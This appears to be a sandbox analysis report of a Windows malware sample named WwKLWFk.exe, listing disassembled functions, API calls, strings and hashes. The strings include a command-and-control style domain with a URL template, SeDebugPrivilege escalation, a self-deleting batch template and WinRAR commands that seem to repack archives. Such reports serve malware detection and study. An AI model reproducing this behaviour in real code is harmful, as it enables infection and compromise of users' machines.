API ID: CreateCurrentDirectoryFileLookupModuleNameObjectPathPrivilegeProcessSingleSystemTempThreadValueVersionWaitlstrcpy
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\WwKLWFk.exe$C:\Windows\system32$Documents and Settings
API String ID: 123563730-3214399340
Opcode ID: 5a8d45c7f216d6fde45488f69ed5fd465ed882781ab7f8ba3e695a2692a771fc
Instruction ID: cd784e8eaff95f3e3e2792746ba282bba359bc5403407d057bea3c0c6159ac08
Opcode Fuzzy Hash: 5a8d45c7f216d6fde45488f69ed5fd465ed882781ab7f8ba3e695a2692a771fc
Instruction Fuzzy Hash: 7B11A271520114BBCF20ABA1BD4DEDB7EEEAB3A361F004025F30D911A0CA7145F0CBA1

Function 00211000 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 60
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNEL32(00000003,C0000000,00000003,00000000,00000003,00000080,00000000,HG!,http://%s:%d/%s/%s,002110E8,?), ref: 00211018
GetFileSize.KERNEL32(00000000,00000000,ddos.dnsnb8.net,77068400), ref: 00211029
CreateFileMappingA.KERNEL32(00000000,00000000,00000004,00000000,00000000,00000000), ref: 00211038
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 0021104B
UnmapViewOfFile.KERNEL32(00000000), ref: 00211075
CloseHandle.KERNEL32(?), ref: 0021108B
CloseHandle.KERNEL32(00000000), ref: 0021108E

Strings

ddos.dnsnb8.net, xrefs: 00211026
http://%s:%d/%s/%s, xrefs: 00211000
HG!, xrefs: 00211001

Memory Dump Source

Source File: 00000004.00000002.1418727030.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true

Associated: 00000004.00000002.1418708719.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1418744854.0000000000213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1418776813.0000000000214000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1418801039.0000000000216000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_210000_WwKLWFk.jbxd

Similarity

API ID: File$CloseCreateHandleView$MappingSizeUnmap
String ID: HG!$ddos.dnsnb8.net$http://%s:%d/%s/%s
API String ID: 1223616889-3941796639
Opcode ID: 9278547b04aa2a439a734306a928764e5896c467eee62fbf9f19b32d7802d1fd
Instruction ID: 81846700929904d13821e5b9ae0629d5900ba2b5c3023357bca204206c41a888
Opcode Fuzzy Hash: 9278547b04aa2a439a734306a928764e5896c467eee62fbf9f19b32d7802d1fd
Instruction Fuzzy Hash: FC01C47150024DBFE7309F60AC8CEABBBEDDB587A9F004529F744A2090DA705E948B60

Function 00212C48 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00212C57

Part of subcall function 00211973: PathFileExistsA.SHLWAPI(\N!`N!,00000000,C:\Users\user\AppData\Local\Temp\WwKLWFk.exe), ref: 00211992
Part of subcall function 00211973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 002119BA
Part of subcall function 00211973: Sleep.KERNEL32(00000064), ref: 002119C6
Part of subcall function 00211973: wsprintfA.USER32 ref: 002119EC
Part of subcall function 00211973: CopyFileA.KERNEL32(?,?,00000000), ref: 00211A00
Part of subcall function 00211973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00211A1E
Part of subcall function 00211973: GetFileSize.KERNEL32(?,00000000), ref: 00211A2C
Part of subcall function 00211973: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00211A46
Part of subcall function 00211973: ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 00211A65

CreateThread.KERNEL32(00000000,00000000,00212B8C,00000000,00000000,00000000), ref: 00212C99
WaitForMultipleObjects.KERNEL32(00000001,002116BA,00000001,000000FF,?,002116BA,00000000), ref: 00212CAC
VirtualFree.KERNEL32(00DE0000,00000000,00008000,C:\Users\user\AppData\Local\Temp\WwKLWFk.exe,00214E5C,00214E60,?,002116BA,00000000), ref: 00212CC2

Strings

C:\Users\user\AppData\Local\Temp\WwKLWFk.exe, xrefs: 00212C69

Memory Dump Source

Source File: 00000004.00000002.1418727030.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true

Associated: 00000004.00000002.1418708719.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1418744854.0000000000213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1418776813.0000000000214000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1418801039.0000000000216000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_210000_WwKLWFk.jbxd

Similarity

API ID: File$Create$Virtual$AllocCopyExistsFreeMultipleObjectsPathReadSizeSleepThreadWaitmemsetwsprintf
String ID: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe
API String ID: 2042498389-2197398117
Opcode ID: f2e6d2c66711ad131a3018756190bf87b967147ccded4b9da73f3567761caebb
Instruction ID: e17a590aa43c4bc2848c4ff3d9cd0609f50bc26478b35496b8e22311d97164d0
Opcode Fuzzy Hash: f2e6d2c66711ad131a3018756190bf87b967147ccded4b9da73f3567761caebb
Instruction Fuzzy Hash: F7018471651224BBD710EB95AC0EEDF7EEDEF25B60F108121F609DA1C1D9A09AB4C7E0

Function 002114E1 Relevance: 4.6, APIs: 3, Instructions: 55
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 00211504
VirtualQuery.KERNEL32(002114E1,?,0000001C), ref: 00211525
ExitProcess.KERNEL32 ref: 0021157A

Memory Dump Source

Source File: 00000004.00000002.1418727030.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true

Associated: 00000004.00000002.1418708719.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1418744854.0000000000213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1418776813.0000000000214000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1418801039.0000000000216000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_210000_WwKLWFk.jbxd

Similarity

API ID: ExitHandleModuleProcessQueryVirtual
String ID:
API String ID: 3946701194-0
Opcode ID: 656d6ffe21ab56daf764283001fb6acd408428d0a7d562a642895108b64fd29a
Instruction ID: a8457e6aebf068d545291094c8d5bc8016ab4687b407b4ed0e07fd33ff5aa101
Opcode Fuzzy Hash: 656d6ffe21ab56daf764283001fb6acd408428d0a7d562a642895108b64fd29a
Instruction Fuzzy Hash: 60117371911206EFCF10EF65B8896FD77FDEBB4B10B50803AF506D2150EA7489A1DB50

Function 00211915 Relevance: 4.5, APIs: 3, Instructions: 41
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00211933
GetFileTime.KERNEL32(000000FF,?,?,?), ref: 00211947

Memory Dump Source

Source File: 00000004.00000002.1418727030.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true

Associated: 00000004.00000002.1418708719.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1418744854.0000000000213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1418776813.0000000000214000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1418801039.0000000000216000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_210000_WwKLWFk.jbxd

Similarity

API ID: FileTimememset
String ID:
API String ID: 176422537-0
Opcode ID: e16d8ee415c0d681190f9ea7ba681671fd56e576b53a20ff3c162e358faa5923
Instruction ID: 2de6cf332439301a2aede0e87f8bf42455357ded5d5e0a16f6a497b9d7ac89dd
Opcode Fuzzy Hash: e16d8ee415c0d681190f9ea7ba681671fd56e576b53a20ff3c162e358faa5923
Instruction Fuzzy Hash: DCF04432210209ABDB20DE26DC04AE777EDAB64361F008536F626D5050E770D6A9CBE0

Function 00216158 Relevance: 2.6, APIs: 2, Instructions: 58
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?), ref: 002160DF
VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 00216189
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 002161A5

Memory Dump Source

Source File: 00000004.00000002.1418801039.0000000000216000.00000040.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true

Associated: 00000004.00000002.1418708719.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1418727030.0000000000211000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1418744854.0000000000213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1418776813.0000000000214000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_210000_WwKLWFk.jbxd

Similarity

API ID: Virtual$Free$Alloc
String ID:
API String ID: 1852963964-0
Opcode ID: 4f474c2830d898a7a13ef7e6ef30ff926e56764d45d9af6bbc426a0c8e11d7c7
Instruction ID: cc5ded2649cad0f45c84c2d93aaa2fa08e78da1975e722df00b1a2d016df90f8
Opcode Fuzzy Hash: 4f474c2830d898a7a13ef7e6ef30ff926e56764d45d9af6bbc426a0c8e11d7c7
Instruction Fuzzy Hash: FF116D32A1064ACFCF318E58CC997DD37E1FF15301F690419DE8D5B291DAB129A4CB94

Non-executed Functions

Function 0021119F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\WwKLWFk.exe,?,?,?,?,?,?,002113EF), ref: 002111AB
OpenProcessToken.ADVAPI32(00000000,00000028,002113EF,?,?,?,?,?,?,002113EF), ref: 002111BB
AdjustTokenPrivileges.ADVAPI32(002113EF,00000000,?,00000010,00000000,00000000), ref: 002111EB
CloseHandle.KERNEL32(002113EF), ref: 002111FA
CloseHandle.KERNEL32(?,?,?,?,?,?,?,002113EF), ref: 00211203

Strings

C:\Users\user\AppData\Local\Temp\WwKLWFk.exe, xrefs: 002111A5

Memory Dump Source

Source File: 00000004.00000002.1418727030.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true

Associated: 00000004.00000002.1418708719.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1418744854.0000000000213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1418776813.0000000000214000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1418801039.0000000000216000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_210000_WwKLWFk.jbxd

Similarity

API ID: CloseHandleProcessToken$AdjustCurrentOpenPrivileges
String ID: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe
API String ID: 75692138-2197398117
Opcode ID: 251b9a96d3083a46019ec0e1124e3ae0e4c5a2d8a0f7a240349b01cb25421404
Instruction ID: 88e6e5f0fb6ba43f54984afb71941af1106b7bae778d082b11a16d2819130808
Opcode Fuzzy Hash: 251b9a96d3083a46019ec0e1124e3ae0e4c5a2d8a0f7a240349b01cb25421404
Instruction Fuzzy Hash: B00112B1900209EFDB00DFE4D989AEEBBF9FB18304F108069E606A2250DB709F849B50

Function 0021139F Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 109COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\WwKLWFk.exe), ref: 002113BC
LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 002113DA
GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 00211448

Part of subcall function 0021119F: GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\WwKLWFk.exe,?,?,?,?,?,?,002113EF), ref: 002111AB
Part of subcall function 0021119F: OpenProcessToken.ADVAPI32(00000000,00000028,002113EF,?,?,?,?,?,?,002113EF), ref: 002111BB
Part of subcall function 0021119F: AdjustTokenPrivileges.ADVAPI32(002113EF,00000000,?,00000010,00000000,00000000), ref: 002111EB
Part of subcall function 0021119F: CloseHandle.KERNEL32(002113EF), ref: 002111FA
Part of subcall function 0021119F: CloseHandle.KERNEL32(?,?,?,?,?,?,?,002113EF), ref: 00211203

Strings

C:\Users\user\AppData\Local\Temp\WwKLWFk.exe, xrefs: 002113A8
SeDebugPrivilege, xrefs: 002113D3

Memory Dump Source

Source File: 00000004.00000002.1418727030.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true

Associated: 00000004.00000002.1418708719.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1418744854.0000000000213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1418776813.0000000000214000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1418801039.0000000000216000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_210000_WwKLWFk.jbxd

Similarity

API ID: Process$CloseCurrentHandleToken$AdjustLookupOpenPrivilegePrivilegesValueVersion
String ID: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe$SeDebugPrivilege
API String ID: 4123949106-3284628267
Opcode ID: d839c4dff2c3f453058a886534425858b147008d660fdf59144765ed9852a81b
Instruction ID: b0ad65da885893c92b1a4530b7e802315690e1fcabd3137aa742e3a189631703
Opcode Fuzzy Hash: d839c4dff2c3f453058a886534425858b147008d660fdf59144765ed9852a81b
Instruction Fuzzy Hash: 18313071D1021AEADF20DFA5DC45FEEBBF8EB64704F2041A9E614B2141E7709EA5CB60

Function 0021239D Relevance: 56.2, APIs: 26, Strings: 6, Instructions: 239sleepfilestringCOMMON

Download Yara Rule

APIs

strstr.MSVCRT ref: 002123CC
CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00212464
GetFileSize.KERNEL32(00000000,00000000), ref: 00212472
CloseHandle.KERNEL32(?,00000000,00000000), ref: 002124A8
memset.MSVCRT ref: 002124B9
strrchr.MSVCRT ref: 002124C9
wsprintfA.USER32 ref: 002124DE
strrchr.MSVCRT ref: 002124ED
memset.MSVCRT ref: 002124F2
memset.MSVCRT ref: 00212505
wsprintfA.USER32 ref: 00212524
Sleep.KERNEL32(000007D0), ref: 00212535
Sleep.KERNEL32(000007D0), ref: 0021255D
memset.MSVCRT ref: 0021256E
wsprintfA.USER32 ref: 00212585
memset.MSVCRT ref: 002125A6
wsprintfA.USER32 ref: 002125CA
Sleep.KERNEL32(000007D0), ref: 002125D0
Sleep.KERNEL32(000007D0,?,?), ref: 002125E5
CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 002125FC
CloseHandle.KERNEL32(00000000,00000000,00000001), ref: 00212611
SetFilePointer.KERNEL32(FFFFFFFF,?,00000000,00000000), ref: 00212642
WriteFile.KERNEL32(?,00000006,?,00000000), ref: 0021265B
SetEndOfFile.KERNEL32 ref: 0021266D
CloseHandle.KERNEL32(00000000), ref: 00212676
RemoveDirectoryA.KERNEL32(?), ref: 00212681

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 002123B1, 002123B6, 002124CD
%s X -ibck "%s" "%s\", xrefs: 0021251E
%s\, xrefs: 0021257F
%s M %s -r -o+ -ep1 "%s" "%s\*", xrefs: 002125C4
-ibck, xrefs: 002125BA
%s%s, xrefs: 002124D8

Memory Dump Source

Source File: 00000004.00000002.1418727030.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true

Associated: 00000004.00000002.1418708719.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1418744854.0000000000213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1418776813.0000000000214000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1418801039.0000000000216000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_210000_WwKLWFk.jbxd

Similarity

API ID: File$memset$Sleepwsprintf$CloseHandle$Createstrrchr$DirectoryPointerRemoveSizeWritestrstr
String ID: %s M %s -r -o+ -ep1 "%s" "%s\*"$%s X -ibck "%s" "%s\"$%s%s$%s\$-ibck$C:\Users\user\AppData\Local\Temp\
API String ID: 2203340711-2180922006
Opcode ID: e273944cc7ddc104c232b6635a466280a2cb3f314a93d23d7ac190130b5d0ba6
Instruction ID: 29e5b09eb1d51bfb6e013dcb75b950cd89a1416c61a4eb95de36893c6b76aa1e
Opcode Fuzzy Hash: e273944cc7ddc104c232b6635a466280a2cb3f314a93d23d7ac190130b5d0ba6
Instruction Fuzzy Hash: 2581D2B1514345EBD710EF60EC48EEB7BEDFBA8704F00451AFA44D2190D770DAA88BA5

Function 0021274A Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 83fileCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00212766
memset.MSVCRT ref: 00212774
SHGetSpecialFolderPathA.SHELL32(00000000,?,00000026,00000000), ref: 00212787
wsprintfA.USER32 ref: 002127AB

Part of subcall function 0021185B: GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,77068400,http://%s:%d/%s/%s,?,?,?,00211118), ref: 00211867
Part of subcall function 0021185B: srand.MSVCRT ref: 00211878
Part of subcall function 0021185B: rand.MSVCRT ref: 00211880
Part of subcall function 0021185B: srand.MSVCRT ref: 00211890
Part of subcall function 0021185B: rand.MSVCRT ref: 00211894

wsprintfA.USER32 ref: 002127C6
CopyFileA.KERNEL32(?,00214C80,00000000), ref: 002127D4
wsprintfA.USER32 ref: 002127F4

Part of subcall function 00211973: PathFileExistsA.SHLWAPI(\N!`N!,00000000,C:\Users\user\AppData\Local\Temp\WwKLWFk.exe), ref: 00211992
Part of subcall function 00211973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 002119BA
Part of subcall function 00211973: Sleep.KERNEL32(00000064), ref: 002119C6
Part of subcall function 00211973: wsprintfA.USER32 ref: 002119EC
Part of subcall function 00211973: CopyFileA.KERNEL32(?,?,00000000), ref: 00211A00
Part of subcall function 00211973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00211A1E
Part of subcall function 00211973: GetFileSize.KERNEL32(?,00000000), ref: 00211A2C
Part of subcall function 00211973: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00211A46
Part of subcall function 00211973: ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 00211A65

DeleteFileA.KERNEL32(?,?,00214E54,00214E58), ref: 0021281A
CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000000,00000000,?,00214E54,00214E58), ref: 00212832

Strings

c_31892.nls, xrefs: 002127DE
C:\Users\user\AppData\Local\Temp\, xrefs: 002127B6
\WinRAR\Rar.exe, xrefs: 00212793
%s%s, xrefs: 002127A5
%s%.8x.exe, xrefs: 002127BB
C:\Windows\system32, xrefs: 002127E3
%s\%s, xrefs: 002127EE

Memory Dump Source

Source File: 00000004.00000002.1418727030.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true

Associated: 00000004.00000002.1418708719.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1418744854.0000000000213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1418776813.0000000000214000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1418801039.0000000000216000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_210000_WwKLWFk.jbxd

Similarity

API ID: File$wsprintf$Create$CopyPathTimememsetrandsrand$AllocDeleteExistsFolderReadSizeSleepSpecialSystemVirtual
String ID: %s%.8x.exe$%s%s$%s\%s$C:\Users\user\AppData\Local\Temp\$C:\Windows\system32$\WinRAR\Rar.exe$c_31892.nls
API String ID: 692489704-3256556265
Opcode ID: fbc8175da9409c5e83f3bb3d5f3f696dd4893360877905c6f59033b56033e7e8
Instruction ID: f1d1a05a9ff9650179c76bc2a86c54def32949bdfeede6d70bd70008e78e2065
Opcode Fuzzy Hash: fbc8175da9409c5e83f3bb3d5f3f696dd4893360877905c6f59033b56033e7e8
Instruction Fuzzy Hash: A82145B695021C7BDB10FBA4AC89FDB77EDEB25744F0145A1B648E2041E6709FE48EA0

Function 00211581 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 67filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0021185B: GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,77068400,http://%s:%d/%s/%s,?,?,?,00211118), ref: 00211867
Part of subcall function 0021185B: srand.MSVCRT ref: 00211878
Part of subcall function 0021185B: rand.MSVCRT ref: 00211880
Part of subcall function 0021185B: srand.MSVCRT ref: 00211890
Part of subcall function 0021185B: rand.MSVCRT ref: 00211894

wsprintfA.USER32 ref: 002115AA
wsprintfA.USER32 ref: 002115C6
lstrlen.KERNEL32(?), ref: 002115D2
CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000000,00000000), ref: 002115EE
WriteFile.KERNEL32(00000000,?,00000000,00000001,00000000), ref: 00211609
CloseHandle.KERNEL32(00000000), ref: 00211612
ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 0021162D

Strings

C:\Users\user\AppData\Local\Temp\WwKLWFk.exe, xrefs: 0021158A, 002115B3, 002115B8, 002115B9
C:\Users\user\AppData\Local\Temp\, xrefs: 00211599
%s%.8x.bat, xrefs: 002115A4
open, xrefs: 00211627
:DELFILEdel "%s"if exist "%s" goto :DELFILEdel "%s", xrefs: 002115C0

Memory Dump Source

Source File: 00000004.00000002.1418727030.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true

Associated: 00000004.00000002.1418708719.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1418744854.0000000000213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1418776813.0000000000214000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1418801039.0000000000216000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_210000_WwKLWFk.jbxd

Similarity

API ID: File$Timerandsrandwsprintf$CloseCreateExecuteHandleShellSystemWritelstrlen
String ID: %s%.8x.bat$:DELFILEdel "%s"if exist "%s" goto :DELFILEdel "%s"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\WwKLWFk.exe$open
API String ID: 617340118-3809860907
Opcode ID: 2f85214cde9cfc18a7b7d69942c1da24207224f4182ef7d4d864769321a0ffd8
Instruction ID: 5009fc45957e07edcb5eb8c7f583103b9a4fa0626c174b078e0279f3d0d0f21c
Opcode Fuzzy Hash: 2f85214cde9cfc18a7b7d69942c1da24207224f4182ef7d4d864769321a0ffd8
Instruction Fuzzy Hash: 9F115476A511287ED720D7A4AC8DDEB7AEDDF69751F000051F94DE2040DA709BD48BB0

Function 0021120E Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 93librarymemoryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ntdll.dll,ZwQuerySystemInformation,00000104,?,?,?,?,00211400), ref: 00211226
GetProcAddress.KERNEL32(00000000), ref: 0021122D
GetCurrentProcessId.KERNEL32(?,?,?,?,00211400), ref: 0021123F
OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,00211400), ref: 00211250
VirtualFree.KERNEL32(00000000,00000000,00008000,?,C:\Users\user\AppData\Local\Temp\WwKLWFk.exe,?,?,?,?,00211400), ref: 0021129E
VirtualAlloc.KERNEL32(00000000,00050000,00003000,00000004,00000001,?,C:\Users\user\AppData\Local\Temp\WwKLWFk.exe,?,?,?,?,00211400), ref: 002112B0
CloseHandle.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\WwKLWFk.exe,?,?,?,?,00211400), ref: 002112F5
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,00211400), ref: 0021130A

Strings

C:\Users\user\AppData\Local\Temp\WwKLWFk.exe, xrefs: 00211262
ZwQuerySystemInformation, xrefs: 00211212
ntdll.dll, xrefs: 00211219

Memory Dump Source

Source File: 00000004.00000002.1418727030.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true

Associated: 00000004.00000002.1418708719.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1418744854.0000000000213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1418776813.0000000000214000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1418801039.0000000000216000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_210000_WwKLWFk.jbxd

Similarity

API ID: Virtual$FreeHandleProcess$AddressAllocCloseCurrentModuleOpenProc
String ID: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe$ZwQuerySystemInformation$ntdll.dll
API String ID: 1500695312-191650490
Opcode ID: a5a784ab67eac7198c467b0f5851a20661374d55a3102b1e4deeee50bd4dea41
Instruction ID: 05e80c36c7b3b312d24578a849b7399d35571588e9548e5f31e00c6030ed53b0
Opcode Fuzzy Hash: a5a784ab67eac7198c467b0f5851a20661374d55a3102b1e4deeee50bd4dea41
Instruction Fuzzy Hash: 4C21F771615322ABD720DF64DC08BEBBAE9FB69B00F104918FA45D6240C770DAA0C7A5

Function 0021189D Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 51processsynchronizationCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 002118B1
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,?,?,000007D0,774D0F00,77068400), ref: 002118D3
CloseHandle.KERNEL32(I%!), ref: 002118E9
WaitForSingleObject.KERNEL32(?,000000FF), ref: 002118F0
GetExitCodeProcess.KERNEL32(?,?), ref: 00211901
CloseHandle.KERNEL32(?), ref: 0021190A

Strings

I%!, xrefs: 002118E0

Memory Dump Source

Source File: 00000004.00000002.1418727030.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true

Associated: 00000004.00000002.1418708719.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1418744854.0000000000213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1418776813.0000000000214000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1418801039.0000000000216000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_210000_WwKLWFk.jbxd

Similarity

API ID: CloseHandleProcess$CodeCreateExitObjectSingleWaitmemset
String ID: I%!
API String ID: 876959470-613461988
Opcode ID: 622d2bcb1cf1be26279bab3703414e1048967dbe098e87f7b7137c866f6d6d45
Instruction ID: 0fe0dfda39983a201d8880414dbc071a90e2c19eef88833be5ef10723ab6663d
Opcode Fuzzy Hash: 622d2bcb1cf1be26279bab3703414e1048967dbe098e87f7b7137c866f6d6d45
Instruction Fuzzy Hash: 76017176901128BBCB21AB95EC4CDDF7FBEEF95760F104021FA15A51A0D6314A68CAA0

Function 0021185B Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 31timeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,77068400,http://%s:%d/%s/%s,?,?,?,00211118), ref: 00211867
srand.MSVCRT ref: 00211878
rand.MSVCRT ref: 00211880
srand.MSVCRT ref: 00211890
rand.MSVCRT ref: 00211894

Strings

ddos.dnsnb8.net, xrefs: 00211862
http://%s:%d/%s/%s, xrefs: 00211860

Memory Dump Source

Source File: 00000004.00000002.1418727030.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true

Associated: 00000004.00000002.1418708719.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1418744854.0000000000213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1418776813.0000000000214000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1418801039.0000000000216000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_210000_WwKLWFk.jbxd

Similarity

API ID: Timerandsrand$FileSystem
String ID: ddos.dnsnb8.net$http://%s:%d/%s/%s
API String ID: 4106363736-3273462101
Opcode ID: c9b01733abf4b5b4851a23d749863c6ce3f13afbc2ae237e0882cd8b0431d761
